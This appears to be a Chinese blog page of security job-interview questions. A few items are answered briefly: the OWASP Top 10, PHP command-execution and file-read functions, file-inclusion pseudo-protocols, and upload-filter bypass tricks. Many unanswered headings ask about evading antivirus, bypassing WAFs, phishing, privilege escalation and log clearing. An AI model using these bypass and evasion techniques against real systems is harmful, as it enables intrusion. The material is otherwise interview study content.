<h2 id="63-OWAP-TOP-10都有哪些？"><a href="#63-OWAP-TOP-10都有哪些？" class="headerlink" title="63-OWAP TOP 10都有哪些？"></a>63-OWAP TOP 10都有哪些？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">1、SQL注入</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">2、失效的身份认证和会话管理</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">3、跨站脚本攻击XSS</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">4、直接引用不安全的对象</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">5、安全配置错误</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">6、敏感信息泄露</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">7、缺少功能级的访问控制</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">8、跨站请求伪造CSRF</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">9、使用含有已知漏洞的组件</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">10、未验证的重定向和转发</span></span><br></pre></td></tr></table></figure>

<h2 id="64-代码执行，文件读取，命令执行的函数都有哪些？"><a href="#64-代码执行，文件读取，命令执行的函数都有哪些？" class="headerlink" title="64- 代码执行，文件读取，命令执行的函数都有哪些？"></a>64- 代码执行，文件读取，命令执行的函数都有哪些？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">1-代码执行：</span></span><br><span class="line">eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">2-文件读取：</span></span><br><span class="line">file_get_contents(),highlight_file(),fopen(),read</span><br><span class="line">file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">3-命令执行：</span></span><br><span class="line">system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()</span><br></pre></td></tr></table></figure>

<h2 id="65-img标签除了onerror属性外，还有其他获取管理员路径的办法吗？"><a href="#65-img标签除了onerror属性外，还有其他获取管理员路径的办法吗？" class="headerlink" title="65- img标签除了onerror属性外，还有其他获取管理员路径的办法吗？"></a>65- img标签除了onerror属性外，还有其他获取管理员路径的办法吗？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_"># </span><span class="language-bash">src指定一个远程的脚本文件，获取referer</span></span><br></pre></td></tr></table></figure>

<h2 id="66-文件包含都有哪些伪协议？"><a href="#66-文件包含都有哪些伪协议？" class="headerlink" title="66-文件包含都有哪些伪协议？"></a>66-文件包含都有哪些伪协议？</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">file://		访问本地文件系统</span><br><span class="line">http://		访问 HTTPs 网址</span><br><span class="line">ftp://		访问 ftp URL </span><br><span class="line">Php://		访问输入输出流</span><br><span class="line">Zlib://		压缩流</span><br><span class="line">Data://		数据</span><br><span class="line">Ssh2://		security shell2 </span><br><span class="line">Expect://		处理交互式的流</span><br><span class="line">Glob://		查找匹配的文件路径</span><br></pre></td></tr></table></figure>



<h2 id="67-文件上传怎么突破过滤？"><a href="#67-文件上传怎么突破过滤？" class="headerlink" title="67-文件上传怎么突破过滤？"></a>67-文件上传怎么突破过滤？</h2><p>前端绕过、大小写突破、双重后缀名突破、过滤绕过、特殊后缀名、特殊后缀名等等</p>
<h2 id="69-cookie-存在哪里？"><a href="#69-cookie-存在哪里？" class="headerlink" title="69-cookie 存在哪里？"></a>69-cookie 存在哪里？</h2><h2 id="70-xss-如何盗取-cookie？"><a href="#70-xss-如何盗取-cookie？" class="headerlink" title="70-xss 如何盗取 cookie？"></a>70-xss 如何盗取 cookie？</h2><h2 id="71-xss-有-cookie-一定可以无用户名密码登录吗？"><a href="#71-xss-有-cookie-一定可以无用户名密码登录吗？" class="headerlink" title="71-xss 有 cookie 一定可以无用户名密码登录吗？"></a>71-xss 有 cookie 一定可以无用户名密码登录吗？</h2><h2 id="72-xss-如何防御？"><a href="#72-xss-如何防御？" class="headerlink" title="72-xss 如何防御？"></a>72-xss 如何防御？</h2><h2 id="73-Https-的作用"><a href="#73-Https-的作用" class="headerlink" title="73-Https 的作用"></a>73-Https 的作用</h2><h2 id="74-防范常见的-Web-攻击"><a href="#74-防范常见的-Web-攻击" class="headerlink" title="74-防范常见的 Web 攻击"></a>74-防范常见的 Web 攻击</h2><h2 id="75-Cookies-和-session-区别"><a href="#75-Cookies-和-session-区别" class="headerlink" title="75-Cookies 和 session 区别"></a>75-Cookies 和 session 区别</h2><h2 id="76-GET-和-POST-的区别"><a href="#76-GET-和-POST-的区别" class="headerlink" title="76-GET 和 POST 的区别"></a>76-GET 和 POST 的区别</h2><h2 id="77-HTTPS-和-HTTP-的区别"><a href="#77-HTTPS-和-HTTP-的区别" class="headerlink" title="77-HTTPS 和 HTTP 的区别"></a>77-HTTPS 和 HTTP 的区别</h2><h2 id="78-session-的工作原理？"><a href="#78-session-的工作原理？" class="headerlink" title="78-session 的工作原理？"></a>78-session 的工作原理？</h2><h2 id="79-http-长连接和短连接的区别"><a href="#79-http-长连接和短连接的区别" class="headerlink" title="79-http 长连接和短连接的区别"></a>79-http 长连接和短连接的区别</h2><h2 id="80-一次完整的-HTTP-请求过程"><a href="#80-一次完整的-HTTP-请求过程" class="headerlink" title="80-一次完整的 HTTP 请求过程"></a>80-一次完整的 HTTP 请求过程</h2><h2 id="81-URI-和-URL-的区别"><a href="#81-URI-和-URL-的区别" class="headerlink" title="81-URI 和 URL 的区别"></a>81-URI 和 URL 的区别</h2><h2 id="82-什么是-SSL-？"><a href="#82-什么是-SSL-？" class="headerlink" title="82-什么是 SSL ？"></a>82-什么是 SSL ？</h2><h2 id="83-https-是如何保证数据传输的安全（SSL-是怎么工作保证安全的）"><a href="#83-https-是如何保证数据传输的安全（SSL-是怎么工作保证安全的）" class="headerlink" title="83-https 是如何保证数据传输的安全（SSL 是怎么工作保证安全的）"></a>83-https 是如何保证数据传输的安全（SSL 是怎么工作保证安全的）</h2><h2 id="84-常见的状态码有哪些？"><a href="#84-常见的状态码有哪些？" class="headerlink" title="84-常见的状态码有哪些？"></a>84-常见的状态码有哪些？</h2><h2 id="85-防范常见的-Web-攻击"><a href="#85-防范常见的-Web-攻击" class="headerlink" title="85-防范常见的 Web 攻击"></a>85-防范常见的 Web 攻击</h2><h2 id="86-什么是webshell"><a href="#86-什么是webshell" class="headerlink" title="86-什么是webshell"></a>86-什么是webshell</h2><h2 id="87-IIS-服务器应该做哪些方面的保护措施："><a href="#87-IIS-服务器应该做哪些方面的保护措施：" class="headerlink" title="87-IIS 服务器应该做哪些方面的保护措施："></a>87-IIS 服务器应该做哪些方面的保护措施：</h2><h2 id="88-xss-有-cookie-一定可以无用户名密码登录吗？"><a href="#88-xss-有-cookie-一定可以无用户名密码登录吗？" class="headerlink" title="88-xss 有 cookie 一定可以无用户名密码登录吗？"></a>88-xss 有 cookie 一定可以无用户名密码登录吗？</h2><h2 id="89-JNI-函数在-java-中函数名为-com-didi-security-main-C-中的函数名是什么样的？"><a href="#89-JNI-函数在-java-中函数名为-com-didi-security-main-C-中的函数名是什么样的？" class="headerlink" title="89- JNI 函数在 java 中函数名为 com.didi.security.main,C 中的函数名是什么样的？"></a>89- JNI 函数在 java 中函数名为 com.didi.security.main,C 中的函数名是什么样的？</h2><h2 id="90-Frida-和-Xposed-框架？"><a href="#90-Frida-和-Xposed-框架？" class="headerlink" title="90-Frida 和 Xposed 框架？"></a>90-Frida 和 Xposed 框架？</h2><h2 id="91-SSRF-利用方式？"><a href="#91-SSRF-利用方式？" class="headerlink" title="91-SSRF 利用方式？"></a>91-SSRF 利用方式？</h2><h2 id="92-HTTPS-握手过程中用到哪些技术？"><a href="#92-HTTPS-握手过程中用到哪些技术？" class="headerlink" title="92-HTTPS 握手过程中用到哪些技术？"></a>92-HTTPS 握手过程中用到哪些技术？</h2><h2 id="93-请写出两种有可能实现任意命令执行的方式？"><a href="#93-请写出两种有可能实现任意命令执行的方式？" class="headerlink" title="93-请写出两种有可能实现任意命令执行的方式？"></a>93-请写出两种有可能实现任意命令执行的方式？</h2><h2 id="94-常见的中间件漏洞？"><a href="#94-常见的中间件漏洞？" class="headerlink" title="94-常见的中间件漏洞？"></a>94-常见的中间件漏洞？</h2><h2 id="95-OWASP-Top10-有哪些漏洞"><a href="#95-OWASP-Top10-有哪些漏洞" class="headerlink" title="95-OWASP Top10 有哪些漏洞"></a>95-OWASP Top10 有哪些漏洞</h2><h2 id="96-蚁剑-x2F-菜刀-x2F-C-刀-x2F-冰蝎的相同与不相同之处"><a href="#96-蚁剑-x2F-菜刀-x2F-C-刀-x2F-冰蝎的相同与不相同之处" class="headerlink" title="96-蚁剑&#x2F;菜刀&#x2F;C 刀&#x2F;冰蝎的相同与不相同之处"></a>96-蚁剑&#x2F;菜刀&#x2F;C 刀&#x2F;冰蝎的相同与不相同之处</h2><h2 id="97-数据库有哪些，关系型的和非关系型的分别是哪些"><a href="#97-数据库有哪些，关系型的和非关系型的分别是哪些" class="headerlink" title="97-数据库有哪些，关系型的和非关系型的分别是哪些"></a>97-数据库有哪些，关系型的和非关系型的分别是哪些</h2><h2 id="98-为何一个-MYSQL-数据库的站，只有一个-80-端口开放？"><a href="#98-为何一个-MYSQL-数据库的站，只有一个-80-端口开放？" class="headerlink" title="98-为何一个 MYSQL 数据库的站，只有一个 80 端口开放？"></a>98-为何一个 MYSQL 数据库的站，只有一个 80 端口开放？</h2><h2 id="99-一个成熟并且相对安全的-CMS，渗透时扫描目录的意义？"><a href="#99-一个成熟并且相对安全的-CMS，渗透时扫描目录的意义？" class="headerlink" title="99-一个成熟并且相对安全的 CMS，渗透时扫描目录的意义？"></a>99-一个成熟并且相对安全的 CMS，渗透时扫描目录的意义？</h2><h2 id="100-在某后台新闻编辑界面看到编辑器，应该先做什么？"><a href="#100-在某后台新闻编辑界面看到编辑器，应该先做什么？" class="headerlink" title="100-在某后台新闻编辑界面看到编辑器，应该先做什么？"></a>100-在某后台新闻编辑界面看到编辑器，应该先做什么？</h2><h2 id="101-审查上传点的元素有什么意义？"><a href="#101-审查上传点的元素有什么意义？" class="headerlink" title="101-审查上传点的元素有什么意义？"></a>101-审查上传点的元素有什么意义？</h2><h2 id="102-CSRF、XSS-及-XXE-有什么区别，以及修复方式？"><a href="#102-CSRF、XSS-及-XXE-有什么区别，以及修复方式？" class="headerlink" title="102-CSRF、XSS 及 XXE 有什么区别，以及修复方式？"></a>102-CSRF、XSS 及 XXE 有什么区别，以及修复方式？</h2><h2 id="103-3389-无法连接的几种情况"><a href="#103-3389-无法连接的几种情况" class="headerlink" title="103-3389 无法连接的几种情况"></a>103-3389 无法连接的几种情况</h2><h2 id="104-目标站无防护，上传图片可以正常访问，上传脚本格式访问则-403，什么原因？"><a href="#104-目标站无防护，上传图片可以正常访问，上传脚本格式访问则-403，什么原因？" class="headerlink" title="104-目标站无防护，上传图片可以正常访问，上传脚本格式访问则 403，什么原因？"></a>104-目标站无防护，上传图片可以正常访问，上传脚本格式访问则 403，什么原因？</h2><h2 id="105-目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？"><a href="#105-目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？" class="headerlink" title="105-目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？"></a>105-目标站禁止注册用户，找回密码处随便输入用户名提示：“此用户不存在”，你觉得这里怎样利用？</h2><h2 id="106-如何突破注入时字符被转义？"><a href="#106-如何突破注入时字符被转义？" class="headerlink" title="106-如何突破注入时字符被转义？"></a>106-如何突破注入时字符被转义？</h2><h2 id="107-拿到一个-webshell-发现网站根目录下有-htaccess-文件，我们能做什么？"><a href="#107-拿到一个-webshell-发现网站根目录下有-htaccess-文件，我们能做什么？" class="headerlink" title="107-拿到一个 webshell 发现网站根目录下有.htaccess 文件，我们能做什么？"></a>107-拿到一个 webshell 发现网站根目录下有.htaccess 文件，我们能做什么？</h2><h2 id="108-安全狗会追踪变量，从而发现出是一句话木马吗？"><a href="#108-安全狗会追踪变量，从而发现出是一句话木马吗？" class="headerlink" title="108-安全狗会追踪变量，从而发现出是一句话木马吗？"></a>108-安全狗会追踪变量，从而发现出是一句话木马吗？</h2><h2 id="109-提权时选择可读写目录，为何尽量不用带空格的目录？"><a href="#109-提权时选择可读写目录，为何尽量不用带空格的目录？" class="headerlink" title="109-提权时选择可读写目录，为何尽量不用带空格的目录？"></a>109-提权时选择可读写目录，为何尽量不用带空格的目录？</h2><h2 id="110-如何利用这个防注入系统拿-shell？"><a href="#110-如何利用这个防注入系统拿-shell？" class="headerlink" title="110-如何利用这个防注入系统拿 shell？"></a>110-如何利用这个防注入系统拿 shell？</h2><h2 id="111-报错注入的函数有哪些？"><a href="#111-报错注入的函数有哪些？" class="headerlink" title="111-报错注入的函数有哪些？"></a>111-报错注入的函数有哪些？</h2><h2 id="112-延时注入如何来判断？"><a href="#112-延时注入如何来判断？" class="headerlink" title="112-延时注入如何来判断？"></a>112-延时注入如何来判断？</h2><h2 id="113-如何拿一个网站的-webshell？"><a href="#113-如何拿一个网站的-webshell？" class="headerlink" title="113-如何拿一个网站的 webshell？"></a>113-如何拿一个网站的 webshell？</h2><h2 id="114-sql-注入写文件都有哪些函数？"><a href="#114-sql-注入写文件都有哪些函数？" class="headerlink" title="114-sql 注入写文件都有哪些函数？"></a>114-sql 注入写文件都有哪些函数？</h2><h2 id="115-代码执行，文件读取，命令执行的函数都有哪些？"><a href="#115-代码执行，文件读取，命令执行的函数都有哪些？" class="headerlink" title="115-代码执行，文件读取，命令执行的函数都有哪些？"></a>115-代码执行，文件读取，命令执行的函数都有哪些？</h2><h2 id="116-img-标签除了-onerror-属性外，还有其他获取管理员路径的办法吗？"><a href="#116-img-标签除了-onerror-属性外，还有其他获取管理员路径的办法吗？" class="headerlink" title="116-img 标签除了 onerror 属性外，还有其他获取管理员路径的办法吗？"></a>116-img 标签除了 onerror 属性外，还有其他获取管理员路径的办法吗？</h2><h2 id="117-为什么-aspx-木马权限比-asp-大？"><a href="#117-为什么-aspx-木马权限比-asp-大？" class="headerlink" title="117-为什么 aspx 木马权限比 asp 大？"></a>117-为什么 aspx 木马权限比 asp 大？</h2><h2 id="118-如何绕过-waf？"><a href="#118-如何绕过-waf？" class="headerlink" title="118-如何绕过 waf？"></a>118-如何绕过 waf？</h2><h2 id="119-mysql-两种提权方式"><a href="#119-mysql-两种提权方式" class="headerlink" title="119-mysql 两种提权方式"></a>119-mysql 两种提权方式</h2><h2 id="120-宽字节注入产生原理以及根本原因"><a href="#120-宽字节注入产生原理以及根本原因" class="headerlink" title="120-宽字节注入产生原理以及根本原因"></a>120-宽字节注入产生原理以及根本原因</h2><h2 id="121-sql-如何写-shell-x2F-单引号被过滤怎么办"><a href="#121-sql-如何写-shell-x2F-单引号被过滤怎么办" class="headerlink" title="121-sql 如何写 shell&#x2F;单引号被过滤怎么办"></a>121-sql 如何写 shell&#x2F;单引号被过滤怎么办</h2><h2 id="122-XSS-蠕虫的产生条件"><a href="#122-XSS-蠕虫的产生条件" class="headerlink" title="122-XSS 蠕虫的产生条件"></a>122-XSS 蠕虫的产生条件</h2><h2 id="123-常见的上传绕过方式-导致文件包含的函数"><a href="#123-常见的上传绕过方式-导致文件包含的函数" class="headerlink" title="123-常见的上传绕过方式.导致文件包含的函数"></a>123-常见的上传绕过方式.导致文件包含的函数</h2><h2 id="124-导致文件包含的函数"><a href="#124-导致文件包含的函数" class="headerlink" title="124-导致文件包含的函数"></a>124-导致文件包含的函数</h2><h2 id="125-金融行业常见逻辑漏洞"><a href="#125-金融行业常见逻辑漏洞" class="headerlink" title="125-金融行业常见逻辑漏洞"></a>125-金融行业常见逻辑漏洞</h2><h2 id="126-常用-WEB-开发-JAVA-框架"><a href="#126-常用-WEB-开发-JAVA-框架" class="headerlink" title="126-常用 WEB 开发 JAVA 框架"></a>126-常用 WEB 开发 JAVA 框架</h2><h2 id="127-php-中命令执行涉及到的函数"><a href="#127-php-中命令执行涉及到的函数" class="headerlink" title="127-php 中命令执行涉及到的函数"></a>127-php 中命令执行涉及到的函数</h2><h2 id="128-宝塔禁止PHP函数如何绕过？"><a href="#128-宝塔禁止PHP函数如何绕过？" class="headerlink" title="128-宝塔禁止PHP函数如何绕过？"></a>128-宝塔禁止PHP函数如何绕过？</h2><h2 id="129-webshell有system权限但无法执行命令，怎么办？"><a href="#129-webshell有system权限但无法执行命令，怎么办？" class="headerlink" title="129-webshell有system权限但无法执行命令，怎么办？"></a>129-webshell有system权限但无法执行命令，怎么办？</h2><h2 id="130-说下strust2的漏洞利用原理？"><a href="#130-说下strust2的漏洞利用原理？" class="headerlink" title="130-说下strust2的漏洞利用原理？"></a>130-说下strust2的漏洞利用原理？</h2><h2 id="131-php-x2F-java反序列化漏洞的原理-解决方案"><a href="#131-php-x2F-java反序列化漏洞的原理-解决方案" class="headerlink" title="131-php&#x2F;java反序列化漏洞的原理?解决方案?"></a>131-php&#x2F;java反序列化漏洞的原理?解决方案?</h2><h2 id="132-CRLF注入的原理"><a href="#132-CRLF注入的原理" class="headerlink" title="132-CRLF注入的原理"></a>132-CRLF注入的原理</h2><h2 id="133-php的LFI，本地包含漏洞原理是什么？写一段带有漏洞的代码。手工的话如何发掘？如果无报错回显，你是怎么遍历文件的？"><a href="#133-php的LFI，本地包含漏洞原理是什么？写一段带有漏洞的代码。手工的话如何发掘？如果无报错回显，你是怎么遍历文件的？" class="headerlink" title="133-php的LFI，本地包含漏洞原理是什么？写一段带有漏洞的代码。手工的话如何发掘？如果无报错回显，你是怎么遍历文件的？"></a>133-php的LFI，本地包含漏洞原理是什么？写一段带有漏洞的代码。手工的话如何发掘？如果无报错回显，你是怎么遍历文件的？</h2><h2 id="134-说说常见的中间件解析"><a href="#134-说说常见的中间件解析" class="headerlink" title="134-说说常见的中间件解析"></a>134-说说常见的中间件解析</h2><h1 id="二、内网"><a href="#二、内网" class="headerlink" title="二、内网"></a>二、内网</h1><ol>
<li>dll 文件是什么意思，有什么用？</li>
<li>重要协议分布层</li>
<li>arp 协议的工作原理</li>
<li>rip 协议是什么？rip 的工作原理</li>
<li>什么是 RARP？工作原理</li>
<li>OSPF 协议？OSPF 的工作原理</li>
<li>TCP 与 UDP 区别总结</li>
<li>什么是三次握手四次挥手？</li>
<li>tcp 为什么要三次握手？</li>
<li>dns 是什么？dns 的工作原理</li>
<li>OSI 的七层模型都有哪些？</li>
<li>session 的工作原理？什么是 TCP 粘包&#x2F;拆包？发生原因？解决方案</li>
<li>TCP 如何保证可靠传输？</li>
<li>TCP 对应的应用层协议，UDP 对应的应用层协议</li>
<li>什么是网络钓鱼？</li>
<li>0day 漏洞</li>
<li>Rootkit 是什么意思</li>
<li>蜜罐</li>
<li>ssh</li>
<li>震网病毒</li>
<li>NAT（网络地址转换）协议</li>
<li>内网穿透</li>
<li>虚拟专用网络</li>
<li>二层交换机</li>
<li>路由技术</li>
<li>三层交换机</li>
<li>IPv6 地址表示</li>
<li>内网渗透思路？</li>
<li>正向代理和反向代理的区别</li>
<li>Windows 常用的提权方法</li>
<li>Linux 提权有哪些方法</li>
<li>3389 无法连接的几种情况</li>
<li>nmap，扫描的几种方式</li>
<li>渗透测试中常见的端口</li>
<li>用什么扫描端口，目录</li>
<li>3306 1443 8080 是什么端口</li>
<li>清理日志要清理哪些(windows和linux)</li>
<li>go语言免杀shellcode如何免杀？免杀原理是什么？</li>
<li>windows defender防御机制原理，如何绕过？</li>
<li>卡巴斯基进程保护如何绕过进行进程迁移？</li>
<li>fastjson不出网如何利用？</li>
<li>工作组环境下如何进行渗透？详细说明渗透思路。</li>
<li>内存马的机制？</li>
<li>不出网有什么方法，正向shel l 方法除了reg之类的，还有什么？</li>
<li>什么是域内委派？利用要点？</li>
<li>shiro漏洞类型，721原理，721利用要注意什么？</li>
<li>hvv三大洞？</li>
<li>天擎终端防护如何绕过，绕过思路？</li>
<li>免杀木马的思路？</li>
<li>jsonp跨域的危害，cors跨域的危害？</li>
<li>说出印象比较深刻的一次外网打点进入内网？</li>
<li>rmi的利用原理？</li>
<li>域内的一个普通用户（非域用户）如何进行利用？</li>
<li>证书透明度的危害？</li>
<li>内网渗透降权的作用？</li>
<li>TrustedInstall权限的原理是什么？</li>
<li>2008的服务权限如何进行提权？</li>
<li>Windows UAC原理是什么？</li>
<li>Windows添加用户如何绕过火绒以及360？</li>
<li>如何伪造钓鱼邮箱？会面临什么问题？</li>
<li>分别说出redis、weblogic、Mongodb、Elasticsearch、ldap、sambda、Jenkins、rmi默认端口。</li>
<li>烂土豆提权使用过吗？它的原理？</li>
<li>powershell免杀怎么制作？</li>
<li>提取内存hash被查杀，如何绕过？</li>
<li>分别说下linux、windows的权限维持？</li>
<li>如何开展红队工作？</li>
<li>如何把shellcode嵌入到正常exe中？</li>
<li>描述下Spring框架的几个漏洞？</li>
</ol>
<h1 id="三、其他"><a href="#三、其他" class="headerlink" title="三、其他"></a>三、其他</h1><h2 id="一、对称加密和非对称加密"><a href="#一、对称加密和非对称加密" class="headerlink" title="一、对称加密和非对称加密"></a>一、对称加密和非对称加密</h2><ol>
<li>对称加密:加密解密用同一个密钥</li>
<li>非对称加密:公钥加密,私钥解密;公钥可以公开给别人进行加密,私钥永远在自己手里</li>
<li>SYN 攻击原理</li>
<li>什么是网络钓鱼？</li>
<li>什么是 CC 攻击？</li>
<li>Web 服务器被入侵后，怎样进行排查？</li>
<li>你获取网络安全知识途径有哪些？</li>
<li>DDOS</li>
<li>手工查找后门木马的小技巧</li>
<li>脱壳</li>
<li>“人肉搜索”</li>
<li>SYN Flood 的基本原理</li>
<li>什么是手机”越狱“</li>
<li>主机被入侵，你会如何处理这件事自查解决方案：</li>
<li>证书要考哪些？</li>
<li>宏病毒？</li>
<li>APP 加壳？</li>
<li>勒索软件 Wanacry 的特征？蠕虫、僵尸病毒</li>
<li>ARM32 位指令中，返回值和返回地址保存在哪个寄存器中？</li>
<li>Android APP 逆向分析步骤一般是怎么样的？</li>
<li>ddos 如何防护</li>
<li>有没有抓过包，会不会写 wireshark 过滤规则</li>
<li>如何加固一个域环境下的 Windows 桌面工作环境？请给出你的思路。</li>
<li>RSA 算法</li>
<li>AES／DES 的具体工作步骤</li>
<li>如何开展蓝队工作？</li>
</ol>
<h2 id="二、什么是同源策略？"><a href="#二、什么是同源策略？" class="headerlink" title="二、什么是同源策略？"></a>二、什么是同源策略？</h2><h1 id="四、素质面："><a href="#四、素质面：" class="headerlink" title="四、素质面："></a>四、素质面：</h1><h2 id="1-自我介绍？"><a href="#1-自我介绍？" class="headerlink" title="1-自我介绍？"></a>1-自我介绍？</h2><h2 id="2-你愿意加班吗？"><a href="#2-你愿意加班吗？" class="headerlink" title="2-你愿意加班吗？"></a>2-你愿意加班吗？</h2><h2 id="3-为什么投我们公司？"><a href="#3-为什么投我们公司？" class="headerlink" title="3-为什么投我们公司？"></a>3-为什么投我们公司？</h2><h2 id="4-你觉得有哪些是你会别人不会的？"><a href="#4-你觉得有哪些是你会别人不会的？" class="headerlink" title="4-你觉得有哪些是你会别人不会的？"></a>4-你觉得有哪些是你会别人不会的？</h2><h2 id="5-你最想在哪些城市发展？"><a href="#5-你最想在哪些城市发展？" class="headerlink" title="5-你最想在哪些城市发展？"></a>5-你最想在哪些城市发展？</h2>
    </div>

    
</div>
    <div class="footer" id="footer">
    <p><h4>版权所有 © 2020 | 作者: Mortal | 主题 By <a class="theme-author" target="_blank" rel="noopener" href="https://github.com/Xunzhuo/hexo-theme-coder" style="font-size:14px; color: #969696">Coder</a></h4>
    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        <span id="busuanzi_container_site_pv">本站浏览总访问量: <span id="busuanzi_value_site_pv"></span></span>
        <span class="post-meta-divider">|</span>
        <span id="busuanzi_container_site_uv">本站访问人数: <span id="busuanzi_value_site_uv"></span></span>
    
    <label class="el-switch el-switch-blue el-switch-sm" style="vertical-align: sub;">
        <input type="checkbox" name="switch" id="update_style">
        <span class="el-switch-style"></span>
    </label>

    <!--         <script type="text/javascript">
    var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
    document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
    </script> -->
</p>
</div>

<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="NOsswOncKgc8HOxqo9oxIWlX-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="z1FihjWEbS8uIfUQdmCtK7zz">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
color: #698fca;
}
.v .vlist .vcard .vhead .vsys {
color: #3a3e4a;
}
.v .vlist .vcard .vh .vmeta .vat {
color: #638fd5;
}
.v .vlist .vcard .vhead .vnick {
color: #6ba1ff;
}
.v a {
color: #8696b1;
}
.v .vlist .vcard .vhead .vnick:hover {
color: #669bfc;
}
</style>
    <script type="text/javascript" color="173,174,173" opacity='1' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
